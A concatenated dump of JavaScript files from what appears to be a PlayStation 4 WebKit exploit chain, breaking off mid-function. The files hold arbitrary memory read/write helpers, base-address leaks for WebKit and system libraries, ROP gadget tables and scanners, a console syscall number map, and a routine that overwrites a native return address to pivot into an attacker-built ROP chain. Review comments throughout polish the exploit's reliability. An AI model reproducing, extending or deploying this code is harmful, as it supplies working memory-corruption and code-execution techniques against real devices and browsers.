747 | p.write4(reactPSPlus.add32(0x00000ba4), 0x00000009);
748 | p.write4(reactPSPlus.add32(0x00000ba8), 0x00000000);
749 | p.write4(reactPSPlus.add32(0x00000bac), 0x00000000);
750 | p.write4(reactPSPlus.add32(0x00000bb0), 0x00000000);
751 | p.write4(reactPSPlus.add32(0x00000bb4), 0x00000000);
752 | }
--------------------------------------------------------------------------------
/www/rop.js:
--------------------------------------------------------------------------------
// Basic memory functions
//
// Allocate `size` bytes of backing storage and return a pointer object (the
// value p.read8 yields, with add32/etc.) that the p.read*/p.write* primitives
// can use. The Uint8Array is over-allocated by 0x10000 bytes and pushed onto
// window.nogc BEFORE its address is taken, so the engine keeps it alive and the
// leaked address stays valid; `ptr.backing` keeps a JS-side reference to the
// same bytes. The statement order is load-bearing for that reason.
// NOTE(review): the 0x10000 slack and the +0x10 read into the leaked object
// (presumably its data-pointer field) are engine-layout assumptions shared by
// the other helpers in this file — confirm against the target WebKit build.
function malloc(size)
{
    var backing = new Uint8Array(0x10000 + size);

    // Pin first: the address read below is only meaningful while `backing` is reachable.
    window.nogc.push(backing);

    var ptr = p.read8(p.leakval(backing).add32(0x10));
    ptr.backing = backing;

    return ptr;
}
13 |
// Same as malloc(), but sized in 32-bit words: allocates `size * 4` bytes
// (plus the 0x10000 slack) and attaches a Uint32Array view over the WHOLE
// backing buffer as `ptr.backing`, so the caller can fill the memory word-wise
// from JS. The returned pointer is leaked exactly as in malloc().
function mallocu32(size) {
    var backing = new Uint8Array(0x10000 + size * 4);

    // Pin before leaking the address (see malloc()).
    window.nogc.push(backing);

    var ptr = p.read8(p.leakval(backing).add32(0x10));
    ptr.backing = new Uint32Array(backing.buffer);

    return ptr;
}
24 |
// Copy `str` into a fresh, NUL-terminated byte array and return the leaked
// address of that array (read from +0x10 of the view's object, as in malloc —
// presumably its data pointer). Only the low 8 bits of each UTF-16 code unit
// are kept (`& 0xFF`), so characters outside Latin-1 are silently truncated;
// the extra trailing byte is left at its zero initial value as the terminator.
// The view is pinned on window.nogc but, unlike malloc(), no `.backing`
// reference is attached to the returned pointer.
function stringify(str)
{
    var bufView = new Uint8Array(str.length + 1);

    for(var i=0; i < str.length; i++) {
        bufView[i] = str.charCodeAt(i) & 0xFF;
    }

    // Pin before leaking the address (see malloc()).
    window.nogc.push(bufView);
    return p.read8(p.leakval(bufView).add32(0x10));
}
36 |
// Class for quickly creating a kernel ROP chain
//
// Constructor-style function: `p` is the primitive object (a parameter here,
// shadowing the script-global `p` that window.rop below uses directly) and
// `addr` is the address of the buffer that serves as the fake stack.
// The object only writes 8-byte slots at addr + stackPointer; it does not
// allocate or clear anything itself.
// NOTE(review): `return this` is only the new object when invoked with `new`;
// called plainly, `this` would be the global object.
var krop = function (p, addr) {
    // Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
    // stackPointer is a byte offset from stackBase, advanced by 8 per slot.
    this.stackBase = addr;
    this.stackPointer = 0;

    // Push instruction / value onto fake stack
    this.push = function (val) {
        p.write8(this.stackBase.add32(this.stackPointer), val);
        this.stackPointer += 8;
    };

    // Write to address with value (helper function)
    // Emits five slots: pop rdi; addr; pop rax; val; mov [rdi], rax.
    // Gadget addresses come from window.gadgets (filled in userland.js).
    // The `addr` parameter shadows the constructor's `addr` inside this helper.
    this.write64 = function (addr, val) {
        this.push(window.gadgets["pop rdi"]);
        this.push(addr);
        this.push(window.gadgets["pop rax"]);
        this.push(val);
        this.push(window.gadgets["mov [rdi], rax"]);
    }

    // Return krop object
    return this;
};
61 |
// Class for quickly creating and managing a ROP chain
//
// `this.stack` is a 0x10000-element Uint32Array (0x40000 bytes) whose storage
// address is leaked once into `this.stackBase` (same +0x10 read as malloc());
// the array is kept alive through `this.stack` rather than window.nogc.
// Slots are written straight to that memory with p.write8, never through the
// typed array. `this.count` is the number of 8-byte slots used so far.
//
// Globals used but not defined here: `p` (the primitive object) and `gadgets`
// (the gadget address table built in userland.js).
// NOTE(review): krop above reads `window.gadgets`; this class reads the bare
// global `gadgets`. Equivalent in a classic script, but worth keeping consistent.
window.rop = function() {
    this.stack = new Uint32Array(0x10000);
    this.stackBase = p.read8(p.leakval(this.stack).add32(0x10));
    this.count = 0;

    // Reset the chain: drop the slot counter and the optional `runtime` hook
    // (a callback some callers install; it is invoked by launch_chain in
    // userland.js), then zero 0xFF0 / 2 = 2040 qwords (0x3FC0 bytes) of the stack.
    // NOTE(review): that is only a prefix of the 0x40000-byte buffer; slots
    // beyond it are not cleared between runs.
    this.clear = function() {
        this.count = 0;
        this.runtime = undefined;

        for(var i = 0; i < 0xFF0 / 2; i++)
        {
            p.write8(this.stackBase.add32(i*8), 0);
        }
    };

    // Reserve the next slot and return its index, so a value that is not known
    // yet can be patched in later with finalizeSymbolic.
    this.pushSymbolic = function() {
        this.count++;
        return this.count-1;
    }

    // Store `val` into the slot with index `idx` (byte offset idx * 8).
    this.finalizeSymbolic = function(idx, val) {
        p.write8(this.stackBase.add32(idx * 8), val);
    }

    // Append `val` as the next slot.
    this.push = function(val) {
        this.finalizeSymbolic(this.pushSymbolic(), val);
    }

    // Append the five-slot sequence that stores `what` at address `where`:
    // pop rdi; where; pop rsi; what; mov [rdi], rsi.
    this.push_write8 = function(where, what)
    {
        this.push(gadgets["pop rdi"]);
        this.push(where);
        this.push(gadgets["pop rsi"]);
        this.push(what);
        this.push(gadgets["mov [rdi], rsi"]);
    }

    // Append a call of `rip` with its arguments preloaded into the x86-64
    // argument registers rdi, rsi, rdx, rcx, r8, r9 (in that order). A register
    // is only loaded when its argument is not undefined (`!=` also skips null),
    // so trailing arguments may be omitted. Returns `this` for chaining.
    this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
    {
        if (rdi != undefined) {
            this.push(gadgets["pop rdi"]);
            this.push(rdi);
        }

        if (rsi != undefined) {
            this.push(gadgets["pop rsi"]);
            this.push(rsi);
        }

        if (rdx != undefined) {
            this.push(gadgets["pop rdx"]);
            this.push(rdx);
        }

        if (rcx != undefined) {
            this.push(gadgets["pop rcx"]);
            this.push(rcx);
        }

        if (r8 != undefined) {
            this.push(gadgets["pop r8"]);
            this.push(r8);
        }

        if (r9 != undefined) {
            this.push(gadgets["pop r9"]);
            this.push(r9);
        }

        this.push(rip);
        return this;
    }

    // Execute the chain through the primitive's loadchain, then reset it and
    // return whatever loadchain returned.
    // NOTE(review): `this.notimes` is never assigned in this class, so it is
    // passed as undefined unless a caller sets it — confirm what loadchain expects.
    this.run = function() {
        var retv = p.loadchain(this, this.notimes);
        this.clear();
        return retv;
    }

    return this;
};
--------------------------------------------------------------------------------
/www/syscalls.js:
--------------------------------------------------------------------------------
// Inverse of window.syscallnames (number -> name).
// NOTE(review): at this point in the file window.syscallnames has not been
// assigned yet (its literal is further down). Function declarations are
// hoisted, so swapkeyval is callable here, but unless an earlier script already
// set window.syscallnames the for-in inside it sees `undefined` and this inverse
// map ends up empty ({}). Moving this line below the table would fix that.
window.nameforsyscall = swapkeyval(window.syscallnames);
// Empty container; presumably populated with per-syscall wrappers outside this file.
window.syscalls = {};
3 |
/* Invert a name -> number map into number -> name, used to look up a syscall
   name by its number. Only own properties are carried over; when two names
   share a number the later one wins. A null/undefined input yields {} because
   for-in over it simply iterates nothing. */
function swapkeyval(json) {
    var byValue = {};
    var name;

    for (name in json) {
        if (!json.hasOwnProperty(name)) {
            continue;
        }
        byValue[json[name]] = name;
    }

    return byValue;
}
14 |
/* A long ass map of system call names -> number, you shouldn't need to touch this */
//
// NOTE(review): this literal contains duplicate keys and duplicate numbers.
// In a JS object literal the LAST occurrence of a key wins, so sys_recvmsg,
// sys_sendmsg, sys_recvfrom and sys_getpeername resolve to 113/114/125/141,
// not to the 27/28/29/31 entries listed first. Two names also share a single
// number (47 and 655), so the inverse map built by swapkeyval keeps only the
// later name for each of those. Which value is intended needs confirming
// against the target, so the entries are only flagged inline below.
window.syscallnames =
{
    "sys_exit": 1,
    "sys_fork": 2,
    "sys_read": 3,
    "sys_write": 4,
    "sys_open": 5,
    "sys_close": 6,
    "sys_wait4": 7,
    "sys_unlink": 10,
    "sys_chdir": 12,
    "sys_chmod": 15,
    "sys_getpid": 20,
    "sys_setuid": 23,
    "sys_getuid": 24,
    "sys_geteuid": 25,
    "sys_recvmsg": 27,
    "sys_sendmsg": 28,
    "sys_recvfrom": 29,
    "sys_accept": 30,
    "sys_getpeername": 31,
    "sys_getsockname": 32,
    "sys_access": 33,
    "sys_chflags": 34,
    "sys_fchflags": 35,
    "sys_sync": 36,
    "sys_kill": 37,
    "sys_stat": 38,
    "sys_getppid": 39,
    "sys_dup": 41,
    "sys_pipe": 42,
    "sys_getegid": 43,
    "sys_profil": 44,
    "sys_getgid": 47,
    "sys_getlogin": 49,
    "sys_setlogin": 50,
    "sys_sigaltstack": 53,
    "sys_ioctl": 54,
    "sys_reboot": 55,
    "sys_revoke": 56,
    "sys_execve": 59,
    "sys_msync": 65,
    "sys_munmap": 73,
    "sys_mprotect": 74,
    "sys_madvise": 75,
    "sys_mincore": 78,
    "sys_getgroups": 79,
    "sys_setgroups": 80,
    "sys_setitimer": 83,
    "sys_getitimer": 86,
    "sys_getdtablesize": 89,
    "sys_dup2": 90,
    "sys_fcntl": 92,
    "sys_select": 93,
    "sys_fsync": 95,
    "sys_setpriority": 96,
    "sys_socket": 97,
    "sys_connect": 98,
    "sys_getpriority": 100,
    "sys_send": 101,
    "sys_recv": 102,
    "sys_bind": 104,
    "sys_setsockopt": 105,
    "sys_listen": 106,
    "sys_recvmsg": 113,      // duplicate key: overrides the 27 entry above
    "sys_sendmsg": 114,      // duplicate key: overrides the 28 entry above
    "sys_gettimeofday": 116,
    "sys_getrusage": 117,
    "sys_getsockopt": 118,
    "sys_readv": 120,
    "sys_writev": 121,
    "sys_settimeofday": 122,
    "sys_fchmod": 124,
    "sys_recvfrom": 125,     // duplicate key: overrides the 29 entry above
    "sys_setreuid": 126,
    "sys_setregid": 127,
    "sys_rename": 128,
    "sys_flock": 131,
    "sys_sendto": 133,
    "sys_shutdown": 134,
    "sys_socketpair": 135,
    "sys_mkdir": 136,
    "sys_rmdir": 137,
    "sys_utimes": 138,
    "sys_adjtime": 140,
    "sys_getpeername": 141,  // duplicate key: overrides the 31 entry above
    "sys_setsid": 147,
    "sys_sysarch": 165,
    "sys_setegid": 182,
    "sys_seteuid": 183,
    "sys_fstat": 189,
    "sys_lstat": 190,
    "sys_pathconf": 191,
    "sys_fpathconf": 192,
    "sys_getrlimit": 194,
    "sys_setrlimit": 195,
    "sys_getdirentries": 196,
    "sys___sysctl": 202,
    "sys_mlock": 203,
    "sys_munlock": 204,
    "sys_futimes": 206,
    "sys_poll": 209,
    "sys_clock_gettime": 232,
    "sys_clock_settime": 233,
    "sys_clock_getres": 234,
    "sys_ktimer_create": 235,
    "sys_ktimer_delete": 236,
    "sys_ktimer_settime": 237,
    "sys_ktimer_gettime": 238,
    "sys_ktimer_getoverrun": 239,
    "sys_nanosleep": 240,
    "sys_rfork": 251,
    "sys_issetugid": 253,
    "sys_getdents": 272,
    "sys_preadv": 289,
    "sys_pwritev": 290,
    "sys_getsid": 310,
    "sys_aio_suspend": 315,
    "sys_mlockall": 324,
    "sys_munlockall": 325,
    "sys_sched_setparam": 327,
    "sys_sched_getparam": 328,
    "sys_sched_setscheduler": 329,
    "sys_sched_getscheduler": 330,
    "sys_sched_yield": 331,
    "sys_sched_get_priority_max": 332,
    "sys_sched_get_priority_min": 333,
    "sys_sched_rr_get_interval": 334,
    "sys_utrace": 335,
    "sys_sigprocmask": 340,
    "sys_sigprocmask": 340,  // exact duplicate of the line above (harmless)
    "sys_sigsuspend": 341,
    "sys_sigpending": 343,
    "sys_sigtimedwait": 345,
    "sys_sigwaitinfo": 346,
    "sys_kqueue": 362,
    "sys_kevent": 363,
    "sys_uuidgen": 392,
    "sys_sendfile": 393,
    "sys_fstatfs": 397,
    "sys_ksem_close": 400,
    "sys_ksem_post": 401,
    "sys_ksem_wait": 402,
    "sys_ksem_trywait": 403,
    "sys_ksem_init": 404,
    "sys_ksem_open": 405,
    "sys_ksem_unlink": 406,
    "sys_ksem_getvalue": 407,
    "sys_ksem_destroy": 408,
    "sys_sigaction": 416,
    "sys_sigreturn": 417,
    "sys_getcontext": 421,
    "sys_setcontext": 422,
    "sys_swapcontext": 423,
    "sys_sigwait": 429,
    "sys_thr_create": 430,
    "sys_thr_exit": 431,
    "sys_thr_self": 432,
    "sys_thr_kill": 433,
    "sys_ksem_timedwait": 441,
    "sys_thr_suspend": 442,
    "sys_thr_wake": 443,
    "sys_kldunloadf": 444,
    "sys__umtx_op": 454,
    "sys_thr_new": 455,
    "sys_sigqueue": 456,
    "sys_thr_set_name": 464,
    "sys_rtprio_thread": 466,
    "sys_pread": 475,
    "sys_pwrite": 476,
    "sys_mmap": 477,
    "sys_lseek": 478,
    "sys_truncate": 479,
    "sys_ftruncate": 480,
    "sys_thr_kill2": 481,
    "sys_shm_open": 482,
    "sys_shm_unlink": 483,
    "sys_cpuset_getid": 486,
    "sys_cpuset_getaffinity": 487,
    "sys_cpuset_setaffinity": 488,
    "sys_openat": 499,
    "sys_pselect": 522,

    "sys_regmgr_call": 532,
    "sys_jitshm_create": 533,
    "sys_jitshm_alias": 534,
    "sys_dl_get_list": 535,
    "sys_dl_get_info": 536,
    "sys_dl_notify_event": 537,
    "sys_evf_create": 538,
    "sys_evf_delete": 539,
    "sys_evf_open": 540,
    "sys_evf_close": 541,
    "sys_evf_wait": 542,
    "sys_evf_trywait": 543,
    "sys_evf_set": 544,
    "sys_evf_clear": 545,
    "sys_evf_cancel": 546,
    "sys_query_memory_protection": 47,  // NOTE(review): 47 is already sys_getgid above and breaks the 546/548 sequence — verify this number
    "sys_batch_map": 548,
    "sys_osem_create": 549,
    "sys_osem_delete": 550,
    "sys_osem_open": 551,
    "sys_osem_close": 552,
    "sys_osem_wait": 553,
    "sys_osem_trywait": 554,
    "sys_osem_post": 555,
    "sys_osem_cancel": 556,
    "sys_namedobj_create": 557,
    "sys_namedobj_delete": 558,
    "sys_set_vm_container": 559,
    "sys_debug_init": 560,
    "sys_suspend_process": 561,
    "sys_resume_process": 562,
    "sys_opmc_enable": 563,
    "sys_opmc_disable": 564,
    "sys_opmc_set_ctl": 565,
    "sys_opmc_set_ctr": 566,
    "sys_opmc_get_ctr": 567,
    "sys_budget_create": 568,
    "sys_budget_delete": 569,
    "sys_budget_get": 570,
    "sys_budget_set": 571,
    "sys_virtual_query": 572,
    "sys_mdbg_call": 573,
    "sys_sblock_create": 574,
    "sys_sblock_delete": 575,
    "sys_sblock_enter": 576,
    "sys_sblock_exit": 577,
    "sys_sblock_xenter": 578,
    "sys_sblock_xexit": 579,
    "sys_eport_create": 580,
    "sys_eport_delete": 581,
    "sys_eport_trigger": 582,
    "sys_eport_open": 583,
    "sys_eport_close": 584,
    "sys_is_in_sandbox": 585,
    "sys_dmem_container": 586,
    "sys_get_authinfo": 587,
    "sys_mname": 588,
    "sys_dynlib_dlopen": 589,
    "sys_dynlib_dlclose": 590,
    "sys_dynlib_dlsym": 591,
    "sys_dynlib_get_list": 592,
    "sys_dynlib_get_info": 593,
    "sys_dynlib_load_prx": 594,
    "sys_dynlib_unload_prx": 595,
    "sys_dynlib_do_copy_relocations": 596,
    "sys_dynlib_prepare_dlclose": 597,
    "sys_dynlib_get_proc_param": 598,
    "sys_dynlib_process_needed_and_relocate": 599,
    "sys_sandbox_path": 600,
    "sys_mdbg_service": 601,
    "sys_randomized_path": 602,
    "sys_rdup": 603,
    "sys_dl_get_metadata": 604,
    "sys_workaround8849": 605,
    "sys_is_development_mode": 606,
    "sys_get_self_auth_info": 607,
    "sys_dynlib_get_info_ex": 608,
    "sys_budget_get_ptype": 610,  // NOTE(review): 610 listed before 609 — verify these two are not swapped
    "sys_budget_getid": 609,
    "sys_get_paging_stats_of_all_threads": 611,
    "sys_get_proc_type_info": 612,
    "sys_get_resident_count": 613,
    "sys_prepare_to_suspend_process": 614,
    "sys_get_resident_fmem_count": 615,
    "sys_thr_get_name": 616,
    "sys_set_gpo": 617,
    "sys_get_paging_stats_of_all_objects": 618,
    "sys_test_debug_rwmem": 619,
    "sys_free_stack": 620,
    "sys_suspend_system": 621,
    "sys_ipmimgr_call": 622,
    "sys_get_gpo": 623,
    "sys_get_vm_map_timestamp": 624,
    "sys_opmc_set_hw": 625,
    "sys_opmc_get_hw": 626,
    "sys_get_cpu_usage_all": 627,
    "sys_mmap_dmem": 628,
    "sys_physhm_open": 629,
    "sys_physhm_unlink": 630,
    "sys_resume_internal_hdd": 631,
    "sys_thr_suspend_ucontext": 632,
    "sys_thr_resume_ucontext": 633,
    "sys_thr_get_ucontext": 634,
    "sys_thr_set_ucontext": 635,
    "sys_set_timezone_info": 636,
    "sys_set_phys_fmem_limit": 637,
    "sys_utc_to_localtime": 638,
    "sys_localtime_to_utc": 639,
    "sys_set_uevt": 640,
    "sys_get_cpu_usage_proc": 641,
    "sys_get_map_statistics": 642,
    "sys_set_chicken_switches": 643,
    "sys_extend_page_table_pool": 644,
    "sys_645": 645,
    "sys_get_kernel_mem_statistics": 646,
    "sys_get_sdk_compiled_version": 647,
    "sys_app_state_change": 648,
    "sys_dynlib_get_obj_member": 649,
    "sys_budget_get_ptype_of_budget": 650,
    "sys_prepare_to_resume_process": 651,
    "sys_process_terminate": 652,
    "sys_blockpool_open": 653,
    "sys_blockpool_map": 654,
    "sys_blockpool_unmap": 655,
    "sys_dynlib_get_info_for_libdbg": 656,
    "sys_blockpool_batch": 657,
    "sys_fdatasync": 658,
    "sys_dynlib_get_list2": 659,
    "sys_dynlib_get_info2": 660,
    "sys_aio_submit": 661,
    "sys_aio_multi_delete": 662,
    "sys_aio_multi_wait": 663,
    "sys_aio_multi_poll": 664,
    "sys_aio_get_data": 655,  // NOTE(review): 655 is already sys_blockpool_unmap and breaks the 664/666 sequence — verify this number
    "sys_aio_multi_cancel": 666,
    "sys_get_bio_usage_all": 667,
    "sys_aio_create": 668,
    "sys_aio_submit_cmd": 669,
    "sys_aio_init": 670,
    "sys_get_page_table_stats": 671,
    "sys_dynlib_get_list_for_libdbg": 672
}
341 |
--------------------------------------------------------------------------------
/www/userland.js:
--------------------------------------------------------------------------------
1 | var p;
2 |
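// Append `string` plus a newline to the on-page console element.
//
// Only one `print` is defined here: a second declaration of the same `var`
// would silently replace the first and leave dead code behind. The surviving
// behaviour is the HTML one: the value is inserted through innerHTML, so any
// markup in it is rendered rather than shown literally (stage2 also passes
// caught Error objects, which are stringified into the markup), and every
// call re-parses the whole console content via `innerHTML +=`. Prefer
// textContent / a text node if a call site ever carries untrusted text.
var print = function (string) {
    document.getElementById("console").innerHTML += string + "\n";
};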
9 |
// Resolve an import stub of the form `jmp [rip+disp32]` (opcode bytes ff 25)
// located at `addr`. Returns the address of the pointer slot the stub jumps
// through (addr + 6 + disp32), or 0 when the two bytes at `addr` are not that
// opcode. Both 4-byte reads are issued before the opcode check.
var get_jmptgt = function (addr) {
    var opcode = p.read4(addr) & 0xFFFF;
    var disp32 = p.read4(addr.add32(2));

    if (opcode !== 0x25ff) {
        return 0;
    }
    return addr.add32(disp32 + 6);
};
17 |
18 | var gadgetmap_wk = {
19 | "ep": [0x5b, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0x5d, 0xc3],
20 | "pop rsi": [0x5e, 0xc3],
21 | "pop rdi": [0x5f, 0xc3],
22 | "pop rsp": [0x5c, 0xc3],
23 | "pop rax": [0x58, 0xc3],
24 | "pop rdx": [0x5a, 0xc3],
25 | "pop rcx": [0x59, 0xc3],
26 | "pop rsp": [0x5c, 0xc3],
27 | "pop rbp": [0x5d, 0xc3],
28 | "pop r8": [0x47, 0x58, 0xc3],
29 | "pop r9": [0x47, 0x59, 0xc3],
30 | "infloop": [0xeb, 0xfe, 0xc3],
31 | "ret": [0xc3],
32 | "mov [rdi], rsi": [0x48, 0x89, 0x37, 0xc3],
33 | "mov [rax], rsi": [0x48, 0x89, 0x30, 0xc3],
34 | "mov [rdi], rax": [0x48, 0x89, 0x07, 0xc3],
35 | "mov rax, rdi": [0x48, 0x89, 0xf8, 0xc3]
36 | };
37 |
// Byte pattern of the `jop` gadget, stored reversed because the scanner in
// stage2_ compares it backwards from the trailing `ff e0` it spots in the text.
// Declared with `var` because stage2_ later reassigns this name to 0 once the
// gadget is located (or when gadgetcache is used instead).
var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0].reverse();
40 |
41 | var gadgets;
// Wrapper around stage2_: anything it throws is routed to the on-page console
// through print() instead of being lost in the event handler.
window.stage2 = function () {
    try {
        window.stage2_();
    } catch (err) {
        print(err);
    }
};
49 |
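// Precomputed gadget offsets for the WebKit build this page targets; stage2_'s
// findgadget adds each one to webKitBase (via o2wk) and, when this table is
// present, skips the byte scan entirely and clears the scan state.
// Declared with `var` so it is an explicit script-level binding rather than an
// implicit global (a bare assignment is a ReferenceError under strict mode).
// Every key is listed once; repeated keys with the same value add nothing.
var gadgetcache = {
    "ret": 0x0000003C,
    "jmp rax": 0x00000082,
    "ep": 0x000000AD,
    "pop rbp": 0x000000B6,
    "mov [rdi], rax": 0x003ADAEB,
    "pop r8": 0x000179C5,
    "pop rax": 0x000043F5,
    "mov rax, rdi": 0x000058D0,
    "mov rax, [rax]": 0x0006C83A,
    "pop rsi": 0x0008F38A,
    "pop rdi": 0x00038DBA,
    "pop rcx": 0x00052E59,
    "pop rsp": 0x0001E687,
    "mov [rdi], rsi": 0x00023AC2,
    "mov [rax], rsi": 0x00256667,
    "pop rdx": 0x001BE024,
    "pop r9": 0x00BB320F,
    "jop": 0x000C37D0,
    "infloop": 0x01545EAA,

    "add rax, rcx": 0x000156DB,
    "add rax, rsi": 0x001520C6,
    "and rax, rsi": 0x01570B9F,
    "mov rdx, rax": 0x00353B31,
    "mov rdi, rax": 0x015A412F,
    "mov rax, rdx": 0x001CEF20,
    "jmp rdi": 0x00295E7E,

    // Used for kernel exploit stuff
    "mov rbp, rsp": 0x000F094A,
    "mov rax, [rdi]": 0x00046EF9,
    "add rdi, rax": 0x005557DF,
};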
87 |
88 | window.stage2_ = function () {
89 | p = window.prim;
90 |
91 | p.leakfunc = function (func) {
92 | var fptr_store = p.leakval(func);
93 | return (p.read8(fptr_store.add32(0x18))).add32(0x40);
94 | }
95 |
96 | var parseFloatStore = p.leakfunc(parseFloat);
97 | var parseFloatPtr = p.read8(parseFloatStore);
98 | var webKitBase = p.read8(parseFloatStore);
99 | window.webKitBase = webKitBase;
100 |
101 | webKitBase.low &= 0xfffff000;
102 | webKitBase.sub32inplace(0x59c000 - 0x24000);
103 |
104 | var o2wk = function (o) {
105 | return webKitBase.add32(o);
106 | }
107 |
108 | gadgets = {
109 | "stack_chk_fail": o2wk(0xc8),
110 | "memset": o2wk(0x228),
111 | "setjmp": o2wk(0x14f8)
112 | };
113 |
114 | var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets.memset));
115 | libSceLibcInternalBase.low &= 0xfffff000;
116 | libSceLibcInternalBase.sub32inplace(0x20000);
117 |
118 | var libKernelBase = p.read8(get_jmptgt(gadgets.stack_chk_fail));
119 | window.libKernelBase = libKernelBase;
120 | libKernelBase.low &= 0xfffff000;
121 | libKernelBase.sub32inplace(0xd000 + 0x4000);
122 |
123 | var o2lk = function (o) {
124 | return libKernelBase.add32(o);
125 | }
126 |
127 | window.o2lk = o2lk;
128 |
129 | var wkview = new Uint8Array(0x1000);
130 | var wkstr = p.leakval(wkview).add32(0x10);
131 | var orig_wkview_buf = p.read8(wkstr);
132 |
133 | p.write8(wkstr, webKitBase);
134 | p.write4(wkstr.add32(8), 0x367c000);
135 |
136 | var gadgets_to_find = 0;
137 | var gadgetnames = [];
138 | for (var gadgetname in gadgetmap_wk) {
139 | if (gadgetmap_wk.hasOwnProperty(gadgetname)) {
140 | gadgets_to_find++;
141 | gadgetnames.push(gadgetname);
142 | gadgetmap_wk[gadgetname].reverse();
143 | }
144 | }
145 |
146 | gadgets_to_find++;
147 |
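var findgadget = function (donecb) {
    // Resolve every gadget listed in gadgetmap_wk (plus the "jop" gadget) to
    // an absolute WebKit address in `gadgets`, recording offsets in gadgetoffs.
    //
    // Fast path: when gadgetcache exists its offsets are trusted as-is and no
    // scan happens. Slow path: walk wkview (aliased over the WebKit image by
    // the setup above) looking for 0xc3 (ret) bytes and match each reversed
    // pattern backwards from there; while slowpath_jop is set, the jop gadget
    // is matched the same way from an "ff e0" (jmp rax) pair.
    //
    // donecb is only invoked, asynchronously, when everything was found.
    // Change from the original: a miss used to print the list and return,
    // and later code in this file (launch_chain, p.fcall_) then used
    // gadgets["setjmp"] / gadgets["jop"] / gadgets["pop rdi"] without any
    // check, i.e. undefined values were written into code-pointer slots. A
    // miss now throws after printing so the stage aborts before that.
    if (gadgetcache) {
        gadgets_to_find = 0;
        slowpath_jop = 0;

        for (var gadgetname in gadgetcache) {
            if (gadgetcache.hasOwnProperty(gadgetname)) {
                gadgets[gadgetname] = o2wk(gadgetcache[gadgetname]);
            }
        }
    } else {
        for (var i = 0; i < wkview.length; i++) {
            if (wkview[i] == 0xc3) {
                for (var nl = 0; nl < gadgetnames.length; nl++) {
                    var found = 1;
                    if (!gadgetnames[nl]) continue;   // slot already resolved (deleted below)
                    var gadgetbytes = gadgetmap_wk[gadgetnames[nl]];
                    // Patterns were reversed by the caller: index 0 is the ret
                    // byte, so compare backwards from i. Out-of-range reads on
                    // the typed array yield undefined and simply fail the match.
                    for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) {
                        if (gadgetbytes[compareidx] != wkview[i - compareidx]) {
                            found = 0;
                            break;
                        }
                    }
                    if (!found) continue;
                    gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1);
                    gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1;
                    delete gadgetnames[nl];
                    gadgets_to_find--;
                }
            } else if (wkview[i] == 0xe0 && wkview[i - 1] == 0xff && slowpath_jop) {
                var found = 1;
                for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) {
                    if (slowpath_jop[compareidx] != wkview[i - compareidx]) {
                        found = 0;
                        break;
                    }
                }
                if (!found) continue;
                gadgets["jop"] = o2wk(i - slowpath_jop.length + 1);
                gadgetoffs["jop"] = i - slowpath_jop.length + 1;
                gadgets_to_find--;
                slowpath_jop = 0;
            }

            if (!gadgets_to_find) break;
        }
    }
    if (!gadgets_to_find && !slowpath_jop) {
        setTimeout(donecb, 50);
    } else {
        print("missing gadgets: ");
        for (var nl in gadgetnames) {
            print(" - " + gadgetnames[nl]);
        }
        if (slowpath_jop) print(" - jop gadget");
        // Do not let the caller continue with undefined gadget addresses.
        throw new Error("missing gadgets");
    }
}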
205 |
findgadget(function () { });   // the callback is a no-op, so this is effectively a synchronous scan
var hold1;
var hold2;
var holdz;
var holdz1;

// Allocate pairs of identical 4-property objects until hold1 lands exactly
// 0x30 bytes above hold2 (compared on the low 32 bits only), i.e. the two
// sit back-to-back. launch_chain later rewrites hold2's slots at +0 and
// +0x48 through holdz1.
// NOTE(review): there is no attempt cap; if the allocator never produces
// that layout this loop spins forever.
while (1) {
    hold1 = { a: 0, b: 0, c: 0, d: 0 };
    hold2 = { a: 0, b: 0, c: 0, d: 0 };
    holdz1 = p.leakval(hold2);
    holdz = p.leakval(hold1);
    if (holdz.low - 0x30 == holdz1.low) break;
}

var pushframe = [];
pushframe.length = 0x80;   // not referenced anywhere in this chunk
var funcbuf;
var funcbuf32 = new Uint32Array(0x100);
nogc.push(funcbuf32);      // pinned: launch_chain uses its backing store (funcbuf) as the scratch area it plants setjmp / the jop gadget in
225 |
var launch_chain = function (chain) {
    // Run a prepared `chain` (a window.rop object) on the native stack and
    // return p.leakval(rtv) afterwards. Everything below is order-sensitive;
    // what the visible steps do:
    //
    //  1. Plant gadgets["setjmp"] at funcbuf+0x30 and gadgets["jop"] at
    //     funcbuf+0x80, make funcbuf point at itself, and put the jop gadget
    //     into parseFloatStore. Then redirect hold2's slots at +0 and +0x48
    //     (via holdz1) to funcbuf+0x50 / funcbuf and call parseFloat with
    //     hold2 as every argument, restoring the slots afterwards. The
    //     intended effect (inferred, not visible here) is that the jop
    //     gadget routes into setjmp with funcbuf as the jmp_buf, so that
    //     funcbuf+0x10 then holds a saved native stack pointer (saved-rsp
    //     slot of the FreeBSD amd64 jmp_buf — confirm).
    //  2. Apply Array.prototype.splice to reenter_help; reading its `length`
    //     fires valueOf while splice's native frame is live. The trap saves
    //     the 8 bytes at that stack pointer (return address) and the 8 after
    //     it (named stackCookie), appends an epilogue to the chain that
    //     writes both back and pivots to returnToFrame, then overwrites the
    //     two slots with "pop rsp" + chain.stackBase so the native return
    //     lands in the chain.
    //
    // NOTE(review): `rtv` is assigned without `var`, so it becomes an
    // implicit global; nothing in this chunk reads it elsewhere, but check
    // the other scripts before scoping it.
    var stackPointer = 0;
    var stackCookie = 0;
    var orig_reenter_rip = 0;

    var reenter_help = {
        length: {
            valueOf: function () {
                // Fires inside splice; stackPointer was captured in step 1.
                orig_reenter_rip = p.read8(stackPointer);
                stackCookie = p.read8(stackPointer.add32(8));
                var returnToFrame = stackPointer;

                // Append the restore + return-pivot epilogue after the
                // caller's entries, then rewind count to its old value
                // (presumably so the pushed words stay in the buffer
                // without being counted as part of the chain proper).
                var ocnt = chain.count;
                chain.push_write8(stackPointer, orig_reenter_rip);
                chain.push_write8(stackPointer.add32(8), stackCookie);

                // A chain may supply a runtime hook that chooses a different frame to return into.
                if (chain.runtime) returnToFrame = chain.runtime(stackPointer);

